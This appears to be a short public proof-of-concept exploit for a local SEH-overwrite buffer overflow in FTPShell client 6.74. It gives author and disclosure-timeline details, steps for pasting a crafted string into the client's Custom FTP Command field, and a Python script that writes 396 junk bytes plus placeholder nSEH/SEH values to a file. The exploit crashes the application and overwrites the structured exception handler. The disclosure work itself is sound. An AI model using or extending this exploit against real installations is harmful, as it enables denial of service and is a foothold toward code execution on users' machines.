#!/usr/bin/python


# Exploit Type  : DOS
# Exploit Title:  FTPShell client 6.74  -  Local Buffer Overflow (SEH)
# Vulnerable Software & version : FTPShell client 6.74
# Vendor Homepage: https://www.ftpshell.com/
# Software Link: https://www.ftpshell.com/downloadclient.htm
# Tested Windows : Windows Vista Ultimate SP2(32-bit), Windows 7
Professional SP1(32-bit)
# Exploit Author: Debashis Pal
# Timeline
# Vulnerability Discover Date: 03-Sep-2019
# Vulnerability Report to Vendor:03-Sep-2019,No responds
# Again email to Vendor:05-Sep-2019 ,No responds
# Public Disclose : 09-Sep-2019


# PoC
# 1. FTPShellclient6-74POC.txt from POC.py code, open in
notepad(FTPShellclient6-74POC.txt), copy contents
# 2. Open Core FTPShell client 6.74 & connect to a FTP server
(FTPShell client 6.74 i.e. FTP session need to active along with
username & password)
# 3. From FTPShell client 6.74 menu bar select the Tools-> Custom FTP Command
# 4. paste contents from notepad (into "Custom FTP Command" input field)
# 5. Application will crash and SEH overwritten



crash =  "\x41"  * 396 #Junk
crash += "\x43"  * 4   #nSEH
crash += "\x42" *  4   #SEH
crash += "\x44"  * 96 #More Junk


file="FTPShellclient6-74POC.txt"
generate=open(file, "w")
generate.write(crash)
generate.close


Attachment# Application crash and SEH overwritten.jpg


Thanks.